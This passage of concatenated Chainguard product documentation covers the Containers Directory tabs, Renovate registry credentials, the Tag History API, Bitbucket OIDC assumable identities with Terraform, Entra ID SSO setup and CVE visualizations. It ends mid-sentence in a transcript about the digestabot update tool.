Provenance tab outlines how you can verify container signatures and download and verify image Attestations, all with examples using cosign. Specifications tab The Specifications tab is where you can find a number of important details about a given container image, such as whether the image ships with the apk package manager or a shell. It also includes information like the image’s default user ID, environment variables, and its entrypoint. SBOM tab The SBOM tab contains a list of packages in the image. Chainguard Containers are built so that everything contained in the image is a package, meaning that this package list gives a complete view of what’s in the container image. You won’t find anything hidden in the image that isn’t listed in its SBOM tab. The table listing an image’s packages has four columns. Package: the name of each package included in the image’s SBOM. Version: the version of the listed package. Repository: every package found in Chainguard Containers is either built and managed by the Chainguard team or sourced from Wolfi. For packages falling into the latter category, this column will include a link to the Wolfi GitHub repository showing the package source. License: the license under which each package is published. Above the table is a search box you can use to find and filter the packages listed. To the left of this search box is a drop-down menu you can use to select which version of the image you want to find the SBOM for as well as what architecture (either x86_64 or arm64). Finally, to the right of the search box is a button labeled Download SBOM. You can click this button to download the SBOM (in the SPDX format) to your machine. Note that Chainguard began generating SBOMs for its images on November 15, 2023. For this reason, any versions of a given container image that were released before that date will not have any SBOM data to show. Vulnerabilities tab The Vulnerabilities tab contains a list of every CVE one can find within the image. As with the SBOMs tab, the Vulnerabilities tab has a search box you can use to find and filter specific vulnerabilities within the image. There is also a drop-down menu to the left allowing you to select different versions of the container image. Below these is a table listing the vulnerabilities. However, most Chainguard Containers won’t show any vulnerabilities for the latest version. This isn’t an error, as we aim to remove vulnerabilities from images as soon as they arise. To illustrate how this table appears when vulnerabilities are actually present, you can select different versions in the drop-down until you find one with a vulnerability. This example shows the latest version of the argocd image. The Vulnerabilities table has five columns. CVE ID: the official identification number of each vulnerability present in the table. Severity: the severity of each given vulnerability. This can either read Critical, High, Medium, Low, or Unknown Package: showing the package where the vulnerability was found Version: the version of the package containing the vulnerability Last detected: the date and time when the vulnerability last appeared in a scan of the container image To the left of each row in the table is down-pointing chevron (˅). If you click on this symbol, more information about the given vulnerability will appear below the vulnerability’s row. Specifically, this will highlight the Package name and Version number of the package associated with the Vulnerability. It also shows the Fixed version of the package, a brief Description of the vulnerability, and one or more References you can review to learn more about the vulnerability. Please be aware that, as with SBOM data, Chainguard began generating vulnerability information for its images on November 15, 2023. For this reason, any versions of a given image that were released before that date will not have any vulnerability data to show. Advisories tab The next tab is the Advisories tab. When you scan a newly-built Chainguard Container with a vulnerability scanner, typically, no CVEs will be reported. However, as software packages age, more vulnerabilities are reported and CVEs will begin to accumulate in images. When this happens, Chainguard releases security advisories to communicate these vulnerabilities to downstream container image users. You can find all the advisories issued for a given image in its Advisories tab. To learn more about Chainguard security advisories, we encourage you to read our article on How Chainguard Issues Security Advisories as well as our guide on How to Use Chainguard Security Advisories. You an also find every security advisory published for Chainguard Containers by exploring our self-service Security Advisories page. Comparisons tab The last tab is the Comparisons tab. This tab includes useful data that shows how a given Chainguard Container compares against a non-Chainguard alternative in terms of CVE count. It also includes helpful visualizations of these comparisons. For more information, check out our guide on CVE Visualizations. Learn more The Chainguard Containers Directory is a useful tool for understanding what Chainguard Containers are available. To better understand how to work with individual container images, you can see if we have a getting started guide available. We also provide a guide on how to view security advisories through our self-service public Security Advisories page. --- ### Using Renovate with Chainguard Containers URL: https://edu.chainguard.dev/chainguard/chainguard-images/staying-secure/updating-images/renovate/ Last Modified: September 5, 2024 Tags: Chainguard Containers, Product Renovate can be used to alert on updates to Chainguard Containers. This can be an effective way to keep your images up-to-date and CVE free. This article will explain how to configure Renovate to support Chainguard Containers. *NOTE: This article describes using Renovate to alert on new versions of Chainguard Containers. It is not about alerts for Wolfi packages (which is unsupported at the time of writing). Prerequisites This guide assumes you have successfully installed and configured Renovate. If you haven’t already set this up, please refer to the installation instructions. Setting up Credentials for Renovate In order to support versioned images from a private repository, you will need to provide Renovate with credentials to access the Chainguard registry at cgr.dev. You can do this by creating a token with chainctl, as in this example: chainctl auth configure-docker --pull-token This will respond with output such as: To use this pull token in another environment, run this command: docker login "cgr.dev" --username "<USERNAME>" --password "<PASSWORD>" By default, this credential is good for 30 days. You can now configure hostRules in Renovate to support our registry. Depending on how Renovate was set up, you can add this to renovate.json or config.json with a setting such as: { ... "hostRules": [ { "hostType": "docker", "matchHost": "cgr.dev", "username": "<USERNAME>", "password": "<PASSWORD>" }] } Be aware that you SHOULD NOT check this file into source control with the exposed secret. Instead, you can use environment variables which you pass in at runtime if you use a config.js file: module.exports = { ... "hostRules": [ { "hostType": "docker", "matchHost": "cgr.dev", "username": process.env.CGR_USERNAME, "password": process.env.CGR_PASSWORD, }] }; But an even more secure solution would be to create a script which automatically updates the configuration with the correct values by calling chainctl. If you do this, you should also set the credential lifetime to a much shorter period with the –ttl flag: chainctl auth configure-docker --pull-token –ttl 10m This will set the lifetime to 10 minutes, which limits the risk posed if the token should leak. You can also set the lifetime to a longer period for more manual configurations. Updating Versioned Container Images By default, Renovate will now open PRs for any out-of-date versions of images it finds. For example, you can run Renovate by pushing the following Dockerfile to a repository overseen by Renovate: FROM cgr.dev/chainguard.edu/python:3.11-dev AS builder ... FROM cgr.dev/chainguard.edu/python:3.11 ... At the time of writing, version 3.12 was the current version of the Python image, so the following PR was opened by Renovate: Not all images use semantic versioning. Refer to the Renovate documentation for details on how to support different schemes. Ideally, image references should also be pinned to a digest, as shown in the following section. Updating :latest Container Images Renovate also supports updating image references that are pinned to digests. This allows you to keep floating tags such as :latest in sync with the most up-to-date version. As an example, for the following Dockerfile Renovate opened two similar pull requests: FROM cgr.dev/chainguard/go:latest-dev@sha256:ff187ecd4bb5b45b65d680550eed302545e69ec4ed45f276f385e1b4ff0c6231 AS builder WORKDIR /work COPY go.mod /work/ COPY cmd /work/cmd COPY internal /work/internal RUN CGO_ENABLED=0 go build -o hello ./cmd/server FROM cgr.dev/chainguard/static:latest@sha256:5e9c88174a28c259c349f308dd661a6ec61ed5f8c72ecfaefb46cceb811b55a1 COPY --from=builder /work/hello /hello ENTRYPOINT ["/hello"] The following screenshot shows the PR to update the static image: Troubleshooting Validate Renovate configuration If Renovate isn’t working as expected, try running it in debug mode and/or dumping the resolved configuration. For example: LOG_LEVEL=debug renovate --print-config ... "hostRules": [ { "hostType": "docker", "matchHost": "cgr.dev", "username": "<Organizations ID>/<pull token ID>", "password": "***********", "resolvedHost": "cgr.dev" }, {"matchHost": null, "hostType": "local"} ] ... DEBUG: hostRules: basic auth for https://cgr.dev (repository=local) DEBUG: getLabels(https://cgr.dev, ORGANIZATION/static, latest) (repository=local) DEBUG: getManifestResponse(https://cgr.dev, ORGANIZATION/static, latest, get) (repository=local) DEBUG: getManifestResponse(https://cgr.dev, ORGANIZATION/static, sha256:76d71eb53b1b44ec955529ece91c6da222a54fed660ca6b25124935bdd96e133, get) (repository=local) DEBUG: found labels in manifest (repository=local) "labels": { "dev.chainguard.package.main": "static", "org.opencontainers.image.authors": "Chainguard Team https://www.chainguard.dev/", "org.opencontainers.image.created": "2024-12-04T19:55:37Z", "org.opencontainers.image.source": "https://github.com/chainguard-images/images-private/tree/main/images/static", "org.opencontainers.image.url": "https://images.chainguard.dev/directory/image/static/overview?utm_source=cg-academy&utm_medium=referral&utm_campaign=dev-enablement&utm_content=edu-content-chainguard-chainguard-images-working-with-images-renovate", "org.opencontainers.image.vendor": "Chainguard" } Connection Errors If you have problems getting Renovate to monitor cgr.dev, please double check the connection details. Make sure the token is still valid (you can verify with chainctl iam identities list) and it has access to the repository you are referring to. You can test these credentials by running a docker login and docker pull in a clean environment. getReleaseList error You may encounter errors such as the following: DEBUG: getReleaseList error (repository=chainguard-images/images-private, branch=renovate/cgr.dev-chainguard.edu-python-3.x) "type": "github", "apiBaseUrl": "https://api.github.com/", "err": { "message": "`chainguard-images` forbids access via a personal access token (classic). Please use a GitHub App, OAuth App, or a personal access token with fine-grained permissions.", "stack": "Error: `chainguard-images` forbids access via a personal access token (classic). Please use a GitHub App, OAuth App, or a personal access token with fine-grained permissions.\n at … These can be safely ignored. They are caused by Renovate using the org.opencontainers.image.source label on our images to look for a changelog. As this source is set to the private images-private GitHub repository, this request fails. --- ### Using the Tag History API URL: https://edu.chainguard.dev/chainguard/chainguard-images/features/using-the-tag-history-api/ Last Modified: June 16, 2025 Tags: Chainguard Containers, Product Chainguard Containers have automated nightly builds, which ensures our container images are always fresh including any recent patches and updated software. Even though it is important to keep your base images always updated, there will be situations where you’ll want to keep using an older build to make sure nothing will change in your container environment until you feel it’s safe to update. For cases like this, it is useful to point your Dockerfile to use a specific container image digest as base image. A container image digest is a unique identifier that is generated for each and every image build. Digests always change, even when the contents of the image remain the same. If you have a container environment that was working fine but suddenly breaks with a new build, using a previous container image build version by declaring an image digest instead of a tag is a way to keep things up and running until you’re able to assert that a new version of a container environment works as expected with your application. NOTE: If you are looking for a quick way to learn the tag history of a container image, you may want to consider using the chainctl images history command instead of the API. See Examine the History of Container Images for more information. Obtaining a Registry Token Before making API calls, you’ll need to generate a token within Chainguard’s registry. Public Containers The Registry API endpoint for obtaining the token is: https://cgr.dev/token?scope=repository:chainguard/IMAGE_NAME:pull Where IMAGE_NAME is the name of the container image that you want to pull the tag history from. It’s worth noting that the token is only valid for pulling the history of that specific image. For free-tier container images (tagged as latest or latest-dev), you can request a registry token anonymously, without providing any pre-existing auth. The following command will obtain a token for the Python container image and register a variable called auth_header with the resulting value, which you can use in a subsequent command to obtain the tag history: auth_header="Authorization: Bearer $(curl 'https://cgr.dev/token?scope=repository:chainguard/python:pull' \ | jq -r .token)" Private Containers You’ll need to use your Chainguard Docker credentials. This assumes you’ve set up authentication with chainctl auth configure-docker: auth_header="Authorization: Bearer $(echo 'cgr.dev' | docker-credential-cgr get | jq -r .Secret)" You may use the crane tool to get your token instead: auth_header="$(crane auth token -H cgr.dev/ORGANIZATION_NAME/IMAGE_NAME)" Replace ORGANIZATION_NAME and IMAGE_NAME as required. For example, if your organization is foo.com and you’re interested in the chainguard-base image, you will use the following command: auth_header="$(crane auth token -H cgr.dev/foo.com/chainguard-base)You should now be ready to call the API, either manually or programmatically. Calling the API Make sure your authorization header is set, by running the following command: echo $auth_header You should receive Authorization: Bearer followed by a long string (a JWT) as output. You can now run a curl query to this endpoint, following the below format. https://cgr.dev/v2/ORGANIZATION_NAME/IMAGE_NAME/_chainguard/history/IMAGE_TAG Where: For private images ORGANIZATION_NAME is the name of your organization, for example: foo.com. For public images ORGANIZATION_NAME is always chainguard. IMAGE_NAME is the name of the image, for example: chainguard-base or python. IMAGE_TAG is the tag that you want to pull history from. For example, this is how you can fetch the tag history of foo.com’s chainguard-base:latest Chainguard image using curl on the command line: curl -H "$auth_header" \ https://cgr.dev/v2/foo.com/chainguard-base/_chainguard/history/latest | jq Or for a free-tier container image such as python:latest: curl -H "$auth_header" \ https://cgr.dev/v2/chainguard/python/_chainguard/history/latest | jq You should get output like the following: { "history": [ { "updateTimestamp": "2023-05-12T13:46:10.555Z", "digest": "sha256:81c334de6dd4583897f9e8d0691cbb75ad41613474360740824d8a7fa6a8fecb" }, { "updateTimestamp": "2023-05-12T20:50:19.702Z", "digest": "sha256:a8724b7a80cae14263a3b55f7acb5d195fcbb24afbc8067aa5198aa2a9131cde" }, ... ] } Using the start and end parameters In some cases it may be helpful to specify digests created in a given time period rather than querying the entire history of a tag. For this, you can use the start and end parameters. These optional parameters can be added to requests to the Tag History API and should be specified in the IS0 8601 format. To illustrate how to query digests of a container image created in the last week, first create a local shell variable named timestamp. On Ubuntu, you would create the timestamp variable as follows: timestamp=$(date -d "-1 week" +%Y-%m-%dT%H:%M:%SZ) And on Wolfi, you would create it like this: timestamp=$(date -d @$(( $(date +%s ) - 604800 )) +%Y-%m-%dT%H:%M:%SZ) Then to query digests of the python:latest Chainguard Container created in the last week you would run a command like the following: curl -s -H "Authorization: Bearer $tok" \ "https://cgr.dev/v2/chainguard/python/_chainguard/history/latest?start=${timestamp}" | jq To query digests of the python:latest Chainguard Container created before 2024, first create a new timestamp variable like this: timestamp="2024-01-01T00:00:00Z" Then run the query like this: curl -s -H "Authorization: Bearer $tok" \ "https://cgr.dev/v2/chainguard/python/_chainguard/history/latest?end=${timestamp}" | jq Both of these examples filter the curl command’s output through jq, a useful tool for processing JSON on the command line. Page limit Please note that the Tag History API will return a maximum of 1000 records on a single request. For tags with many digests, since the oldest digests are ordered first, it may be necessary to specify the timestamp of the desired digests - for this, the start and end parameters may be used as specified above. Using Container Digests within a Dockerfile Setting up your Dockerfile to use an older build is a matter of modifying your FROM line to use a container image digest instead of a tag. For instance, let’s say you want to make sure you keep using the current latest build of the Python image. In a previous section of this page we obtained the tag history of the Python image, and the most recent build digest is listed as sha256:81c334de6dd4583897f9e8d0691cbb75ad41613474360740824d8a7fa6a8fecb. With that information, you can edit your Dockerfile and replace: FROM cgr.dev/chainguard/python:latest With: FROM cgr.dev/chainguard/python@sha256:81c334de6dd4583897f9e8d0691cbb75ad41613474360740824d8a7fa6a8fecb And your container image will then be locked into that specific build of the python:latest image variant. --- ### Create an Assumable Identity for a Bitbucket Pipeline URL: https://edu.chainguard.dev/chainguard/administration/assumable-ids/identity-examples/bitbucket-identity/ Last Modified: March 21, 2025 Tags: Chainguard Containers, Product, Procedural Chainguard’s assumable identities are identities that can be assumed by external applications or workflows in order to perform certain tasks that would otherwise have to be done by a human. This procedural tutorial outlines how to create an identity using Terraform, and then how to update a Bitbucket pipeline so that it can assume the identity and interact with Chainguard resources. Prerequisites To complete this guide, you will need the following. terraform installed on your local machine. Terraform is an open-source Infrastructure as Code tool which this guide will use to create various cloud resources. Follow the official Terraform documentation for instructions on installing the tool. chainctl — the Chainguard command line interface tool — installed on your local machine. Follow our guide on How to Install chainctl to set this up. A Bitbucket pipeline you can use to test out the identity you’ll create. We recommend following Bitbucket’s Getting Started guide to set this up. If you need to enable pipelines for your repository, visit Bitbucket’s Configure your first pipeline page to get started. Creating Terraform Files We will be using Terraform to create an identity for a Bitbucket pipeline to assume. This step outlines how to create three Terraform configuration files that, together, will produce such an identity. To help explain each configuration file’s purpose, we will go over what they do and how to create each file one by one. First, though, create a directory to hold the Terraform configuration and navigate into it. mkdir ~/bitbucket-id && cd $_ This will help make it easier to clean up your system at the end of this guide. main.tf The first file, which we will call main.tf, will serve as the scaffolding for our Terraform infrastructure. The file will consist of the following content. terraform { required_providers { chainguard = { source = "chainguard-dev/chainguard" } } } This is a fairly barebones Terraform configuration file, but we will define the rest of the resources in the other two files. In main.tf, we declare and initialize the Chainguard Terraform provider. Next, you can create the sample.tf file. sample.tf sample.tf will create a couple of structures that will help us test out the identity with a Bitbucket a workflow. This Terraform configuration consists of two main parts. The first part of the file will contain the following lines. data "chainguard_group" "group" { name = "my-customer.biz" } This section looks up a Chainguard IAM organization named my-customer.biz. This will contain the identity — which will be created by the bitbucket.tf file — to access when we test it out later on. Now you can move on to creating the rest of our Terraform configuration files, bitbucket.tf. bitbucket.tf The bitbucket.tf file is what will actually create the identity for your Bitbucket workflow to assume. The file will consist of four sections, which we’ll go over one by one. The first section creates the identity itself. resource "chainguard_identity" "bitbucket" { parent_id = data.chainguard_group.group.id name = "bitbucket" description = <<EOF This is an identity that authorizes Bitbucket workflows for this repository to assume to interact with chainctl. EOF claim_match { audience = "ari:cloud:bitbucket::workspace/%workspace-uuid%" issuer = "https://api.bitbucket.org/2.0/workspaces/%workspace-name%/pipelines-config/identity/oidc" subject_pattern = "{%repository-uuid%}:.+" } } First, this section creates a Chainguard Identity tied to the chainguard_group looked up in the sample.tf file. The identity is named bitbucket and has a brief description. The most important part of this section is the claim_match. When the Bitbucket pipeline tries to assume this identity later on, it must present a token matching the audience, issuer and subject specified here in order to do so. The audience is the intended recipient of the issued token, while the issuer is the entity that creates the token. Finally, the subject_pattern is the entity (here, the Bitbucket pipeline build) that the token represents. Note that the curly braces around the %repository-uuid% variable are part of the generated OIDC token from Bitbucket, so be sure to include both opening { and closing } characters around your repository UUID. In this case, the issuer field points to https://api.bitbucket.org/2.0/workspaces/%workspace-name%/pipelines-config/identity/oidc, the issuer of JWT tokens for Bitbucket pipelines. Instead of pointing to a literal value with a subject field, though, this file points to a regular expression using the subject_pattern field. When you run a Bitbucket pipeline, it generates a unique identifier for each pipeline - step and appends that to the subject_pattern field. Since the identifier is not known ahead of time, passing the regular expression .+ allows you to specify a subject regex that will work for every build from this pipeline. Refer to your Bitbucket repository OIDC settings page for reference values. To find the page, browse to your Repository settings page, and then find the OpenID Connect section in the left menu. For the purposes of this guide, you will need to replace %workspace-name%, %workspace-uuid%, and %repository-uuid% with the values from your Bitbucket OIDC settings page. The next section will output the new identity’s id value. This is a unique value that represents the identity itself. output "bitbucket-identity" { value = chainguard_identity.bitbucket.id } The section after that looks up the viewer role. data "chainguard_role" "viewer" { name = "viewer" } The final section grants this role to the identity. resource "chainguard_rolebinding" "view-stuff" { identity = chainguard_identity.bitbucket.id group = data.chainguard_group.group.id role = data.chainguard_role.viewer.items[0].id } Run the following command to create this file with each of these sections. Be sure to change the subject_pattern value to align with your own Bitbucket pipeline OIDC variables. For example, if your repository UUID were C668DE74-6D94-4924-90B1-8B9AB7EE9089, you would set the subject_pattern value to "{C668DE74-6D94-4924-90B1-8B9AB7EE9089}:.+", ensuring that the curly braces are included. Following that, your Terraform configuration will be ready. Now you can run a few terraform commands to create the resources defined in your .tf files. Creating Your Resources First, run terraform init to initialize Terraform’s working directory. terraform init Then run terraform plan. This will produce a speculative execution plan that outlines what steps Terraform will take to create the resources defined in the files you set up in the last section. terraform plan If the plan worked successfully and you’re satisfied that it will produce the resources you expect, you can apply it. terraform apply Before going through with applying the Terraform configuration, this command will prompt you to confirm that you want it to do so. Enter yes to apply the configuration. . . . Plan: 4 to add, 0 to change, 0 to destroy. Changes to Outputs: + bitbucket-identity = (known after apply) Do you want to perform these actions? Terraform will perform the actions described above. Only 'yes' will be accepted to approve. Enter a value: After pressing ENTER, the command will complete and will output an bitbucket-identity value. Note that you may receive a PermissionDenied error part way through the apply step. If so, run chainctl auth login once more, and then terraform apply again to resume creating the identity and resources. . . . Apply complete! Resources: 3 added, 0 changed, 0 destroyed. Outputs: bitbucket-identity = "%bitbucket-identity%" This is the identity’s UIDP (unique identity path), which you configured the bitbucket.tf file to emit in the previous section. Note this value down, as you’ll need it when you test this identity using a Bitbucket workflow. If you need to retrieve this UIDP later on, though, you can always run the following chainctl command to obtain a list of the UIDPs of all your existing identities. chainctl iam identities ls You’re now ready to edit a Bitbucket pipeline in order to test out this identity. Testing the identity with a Bitbucket pipeline To test the identity you created with Terraform in the previous section, ensure you have Pipelines enabled for your repository and then create a bitbucket-pipelines.yml file in the root of your repository. Note that if you already have a pipeline with steps defined then you only need to add the oidc: true field to your pipeline to enable OIDC for the step in question. Copy the following pipeline definition into your bitbucket-pipelines.yml file and commit it to the repository. image: atlassian/default-image:3 pipelines: default: - step: oidc: true max-time: 5 script: - curl -o chainctl "https://dl.enforce.dev/chainctl/latest/chainctl_$(uname -s | tr '[:upper:]' '[:lower:]')_$(uname -m)" - chmod +x chainctl # Assume the bitbucket pipeline identity - ./chainctl auth login --identity-token $BITBUCKET_STEP_OIDC_TOKEN --identity %bitbucket-identity% - ./chainctl auth configure-docker --identity-token $BITBUCKET_STEP_OIDC_TOKEN --identity %bitbucket-identity% The important line is the oidc: true option, which enables OIDC for the individual step in the pipeline. This configuration is why the subject_pattern with a regular expression is used in the Terraform configuration, since each step gets its own UUID identifier, which is added to the sub field in the generated OIDC token. Since the step UUID is known known before the build, the subject match needs to use a regular expression. Now you can add the commands for testing the identity like chainctl images repos list in the following example: ... # Assume the bitbucket pipeline identity - ./chainctl auth login --identity-token $BITBUCKET_STEP_OIDC_TOKEN --identity %bitbucket-identity% - ./chainctl images repos list - docker pull cgr.dev/<organization>/<repo>:<tag> Once you commit the bitbucket-pipelines.yml file the pipeline will run. Assuming everything works as expected, your pipeline will be able to assume the identity and run the chainctl images repos list command, listing repos available to the organization. . . . chainctl 100%[===================>] 54.34M 6.78MB/s in 13s 2023-05-17 13:19:45 (4.28 MB/s) - ‘chainctl’ saved [56983552/56983552] Successfully exchanged token. Valid! Id: 3f4ad8a9d5e63be71d631a359ba0a91dcade94ab/d3ed9c70b538a796 If you’d like to experiment further with this identity and what the pipeline can do with it, there are a few parts of this setup that you can tweak. For instance, if you’d like to give this identity different permissions you can change the role data source to the role you would like to grant. data "chainguard_roles" "editor" { name = "editor" } You can also edit the pipeline itself to change its behavior. For example, instead of listing the repos the identity has access to, you could have the workflow inspect the organizations. - ./chainctl images repos list Of course, the Bitbucket pipeline will only be able to perform certain actions on certain resources, depending on what kind of access you grant it. Removing Sample Resources To remove the resources Terraform created, you can run the terraform destroy command. terraform destroy This will destroy the role-binding, and the identity created in this guide. It will not delete the organization. You can then remove the working directory to clean up your system. rm -r ~/bitbucket-id/ Following that, all of the example resources created in this guide will be removed from your system. Learn more For more information about how assumable identities work in Chainguard, check out our conceptual overview of assumable identities. Additionally, the Terraform documentation includes a section on recommended best practices which you can refer to if you’d like to build on this Terraform configuration for a production environment. Likewise, for more information on using Bitbucket pipelines, we encourage you to check out the official project documentation, particularly their documentation on OIDC. --- ### How To Integrate Microsoft Entra ID SSO with Chainguard URL: https://edu.chainguard.dev/chainguard/administration/custom-idps/idp-providers/ms-entra-id/ Last Modified: October 28, 2024 Tags: Chainguard Containers, Procedural The Chainguard platform supports Single sign-on (SSO) authentication for users. By default, users can log in with GitHub, GitLab and Google, but SSO support allows users to bring their own identity provider for authentication. This guide outlines how to create a Microsoft Entra ID (formerly Azure Active Directory) application and integrate it with Chainguard. After completing this guide, you’ll be able to log in to Chainguard using Entra ID and will no longer be limited to the default SSO options. Prerequisites To complete this guide, you will need the following. chainctl installed on your system. Follow our guide on How To Install chainctl if you don’t already have this installed. An Azure account with Admin permissions you can use to set up an Microsoft Entra ID application. NOTE: Without Admin permissions on your Azure account, you will not be able to assign users to the created Entra ID Application. Create a Microsoft Entra ID Application To integrate Microsoft Entra ID with the Chainguard platform, log in to Azure. In the left-hand navigation menu, select Microsoft Entra ID. From the Default Directory Overview page, click the ➕ Add button and select App Registration from the dropdown menu. In the Register an application screen, configure the application as follows. Name: Set the username to “Chainguard” (or similar) to ensure users recognize this application is for authentication to the Chainguard platform. Supported account types: Select the Single tenant option so that only your organization can use this application to authenticate to Chainguard. Redirect URI: Set the platform to Web and the redirect URI to https://issuer.enforce.dev/oauth/callback. Save your configuration by clicking the Register button. Next, you can optionally set additional branding for the application by selecting Branding and properties from the Manage dropdown menu. Here you can set additional metadata for the application, including a Chainguard logo icon here to help your users visually identify this integration. If you’d like, you can use the icon from the Chainguard Console. The console homepage is console.chainguard.dev, and our terms of service and private statements can be found at chainguard.dev/terms-of-service and chainguard.dev/privacy-notice, respectively. Finally, navigate to the Certificates & secrets tab in the Manage dropdown to create a client secret to authenticate the Chainguard platform to Microsoft Entra ID. Select New client secret to add a client secret. In the resulting modal window, add a description and set an expiration date. Finally, take note of the client secret “Value” that is created. You’ll need this to configure the Chainguard platform to use this Microsoft Entra ID application. Configuring Chainguard to use Microsoft Entra ID Now that your Microsoft Entra ID application is ready, you can create the custom identity provider. First, log in to Chainguard with chainctl, using an OIDC provider like Google, GitHub, or GitLab to bootstrap your account. chainctl auth login Note that this bootstrap account can be used as a backup account (that is, a backup account you can use to log in if you ever lose access to your primary account). However, if you prefer to remove this role-binding after configuring the custom IDP, you may also do so. To configure Chainguard, make a note of the following details from your Microsoft Entra ID application: Application (client) Id: This can be found on the Overview tab of the Chainguard application. Client Secret: You noted this down when you set up the client secret in the previous step. Directory (tenant) Id: This can also be found on the Overview tab of the Chainguard application. You will also need the UIDP for the Chainguard organization under which you want to install the identity provider. Your selection won’t affect how your users authenticate but will have implications on who has permission to modify the SSO configuration. You can retrieve a list of all the Chainguard organizations you belong to — along with their UIDPs — with the following command. chainctl iam organizations ls -o table ID | NAME | DESCRIPTION --------------------------------------------------------+-------------+--------------------- 59156e77fb23e1e5ebcb1bd9c5edae471dd85c43 | sample_org | . . . | . . . | Note down the ID value for your chosen organization. With this information in hand, create a new identity provider with the following commands. export NAME=entra-id export CLIENT_ID=<your application/client id here> export CLIENT_SECRET=<your client secret here> export ORG=<your organization UIDP here> export TENANT_ID=<your directory/tenant id here> export ISSUER="https://login.microsoftonline.com/${TENANT_ID}/v2.0" chainctl iam identity-provider create \ --configuration-type=OIDC \ --oidc-client-id=${CLIENT_ID} \ --oidc-client-secret=${CLIENT_SECRET} \ --oidc-issuer=${ISSUER} \ --oidc-additional-scopes=email \ --oidc-additional-scopes=profile \ --parent=${ORG} \ --default-role=viewer \ --name=${NAME} Note the --default-role option. This defines the default role granted to users registering with this identity provider. This example specifies the viewer role, but depending on your needs you might choose editor or owner. If you don’t include this option, you’ll be prompted to specify the role interactively. For more information, refer to the IAM and Security section of our Introduction to Custom Identity Providers in Chainguard tutorial. You can refer to our Generic Integration Guide in our Introduction to Custom Identity Providers doc for more information about the chainctl iam identity-provider create command and its required options. To log in to the Chainguard Console with the new identity provider you just created, navigate to console.chainguard.dev and click Use Your Identity Provider. Next, click Use Your Organization Name and enter the name of the organization associated with the new identity provider. Finally, click the Login with Provider button. This will open up a new window with the Microsoft Entra ID login flow, allowing you to complete the login process through there. You can also use the custom identity provider to log in through chainctl. To do this, run the chainctl auth login command and add the --identity-provider option followed by the identity provider’s ID value: chainctl auth login --identity-provider <IDP-ID> The ID value appears in the ID column of the table returned by the chainctl iam identity-provider create command you ran previously. You can also retrieve this table at any time by running chainctl iam identity-provider ls -o table when logged in. --- ### Using CVE Visualizations URL: https://edu.chainguard.dev/chainguard/chainguard-images/features/cve_visualizations/ Last Modified: March 21, 2025 Tags: Chainguard Containers, Product Chainguard provides CVE Visualizations for all of its container images. This feature creates reports with CVE comparisons between Chainguard Containers and popular alternatives, as well as historical CVE remediation metrics. CVE Visualizations provide insight into image health and can help teams measure the engineering, security, and economic benefits gained from using Chainguard Containers. This guide outlines how you can access a container image’s CVE Visualization in both the Chainguard Console and in the Containers Directory. Accessing CVE Visualizations in the Console You can find CVE Visualizations and reports two separate places in the Chainguard Console: in the Reports section of the left-hand navigation menu and in the Comparison tab of an individual Container’s overview. Reports section Visualizations can be found under the Reports section in the left-hand navigation bar. The Reports page will look similar to the following: At the top of the Reports page will be two tabs: Compare Containers and Historical CVEs. Let’s first review the Compare Containers tab. At the top left of the Compare Containers tab is a drop-down menu which you can use to select the Chainguard Container you want to compare. The contents of this menu are organized in alphabetical order, starting with Organization Containers at the top (if your selected organization has access to specific Chainguard Containers) followed by free-tier Chainguard Containers. After you select a container image, a second drop-down will appear. This will be populated with data on “alternative” images which (if available) you can compare against the selected Chainguard Container. In some cases there will be more than one alternative available, in which case you can select between them using the drop-down. To the right of the alternatives menu you can select a time range for the report. Below the controls, you will find several boxes with statistics and graphs: An overview section showing the current and average CVE counts as well as container image size for the images. A CVEs by Severity section with bar graphs showing the CVE count per day for both images, broken down by severity. Note: Be aware that this section also includes an Export button you can use to download this data as a JSON file. A Total CVEs Over Time section showing a line graph with the total number of CVEs for any given day for each container image. This provides a visual comparison of the difference in CVE count between the images. A Cumulative CVEs Identified section, with a line graph showing the total number of newly identified CVEs since the beginning of the time range selected, for each image. This provides a visual comparison of the CVE accumulation rate between the images. The Historical CVEs tab shows data relating to CVEs that have appeared over the past three months in container images that your organization has access to. Be aware that the totals shown only represent your Organization Containers, and not free-tier images. Note: If you are a member of more than one organization you can switch to another organization by clicking the drop-down menu in the top left corner of the Console. The Historical CVEs tab has two boxes. The first box is labeled Resolved CVEs in Organization Containers and shows a bar chart displaying the number of resolved CVEs by date over the last three months. The second box is labeled Total Resolved CVEs by Severity and shows a horizontal bar chart showing all the resolved CVEs from the past three months. In both graphs, the CVEs are color-coded by severity. Comparison tab You can find this same comparison data when navigating to a specific container image in either the Browse Containers section or in your Organization Containers. After navigating to either of these sections, click on or search for any image you like. By default, you will be taken to the container image’s Versions tab. Click on the Comparison tab at the far right. There, you’ll be presented with the same comparison information found in the Reports section. At the top are some control menus, allowing you to select the date range for the comparison and, if available, the alternative you’d like to compare the Chainguard Container against. This example shows the PHP container image: Accessing CVE Visualizations in the Containers Directory Similar to the CVE reports found in the Browse Containers and Organization Containers section of the Chainguard Console, you can find CVE reports for every one of Chainguard’s container images in the Containers Directory. After navigating to the directory, click on or search for any container image you like. Again, you will be taken to the image’s Versions tab by default. Click on the Comparison tab at the right to view the CVE Comparison data. This example shows the nginx image: Limitations Some container images do not currently have a comparative alternative. In these cases, the Comparison report will only show data for the Chainguard Container. Learn More The CVE data used in these reports is from the Grype vulnerability scanner. Vulnerability data is constantly evolving, so we scan container images each day and store the results. The results shown are the vulnerabilities found on the day in question; scanning the container images again with a newer database will show different results. For more information on CVEs see What Are Software Vulnerabilities and CVEs. You may also find our guide on Using the Chainguard Directory and Console to be of interest. --- ### Keep your Chainguard Containers Up to Date with digestabot URL: https://edu.chainguard.dev/chainguard/chainguard-images/staying-secure/updating-images/digestabot/ Last Modified: December 12, 2024 Tools used in this video digestabot Transcript Today, I’d like to talk about a common question I get asked. How can you keep images up to date while avoiding breaking changes? The basic issue is that we’d like to make sure we’re getting the latest security updates and features for our software. But we really don’t want our applications and infrastructure to break unexpectedly. So there’s a tension between updating all the time, which gives you the latest code and limits unexpected breakages. In this example, we have a multi-stage Python build using Chainguard Container which are pinned to Digest. Now, Digests are content-based hashes of images. So if you reference an image by Digest, you will always get exactly the same image every time. Now, this is fantastic for reproducibility. As I know, if anybody uses this Dockerfile, they will get exactly the same images that I was using. And this is especially important in Python, where if the version changes, so we go from Python 3.12 to Python 3.13, you might find that various libraries don’t work until they’re updated. Now, how do you do updates then? Well, you could manually go in and change, bump this Digest yourself. But we’ve got a better solution for you that I want to talk about briefly today, and it’s called Digestabot. Digestabot is a GitHub action that can be set to run on a cron job and will open a PR when it detects there’s a newer version of the image available. You 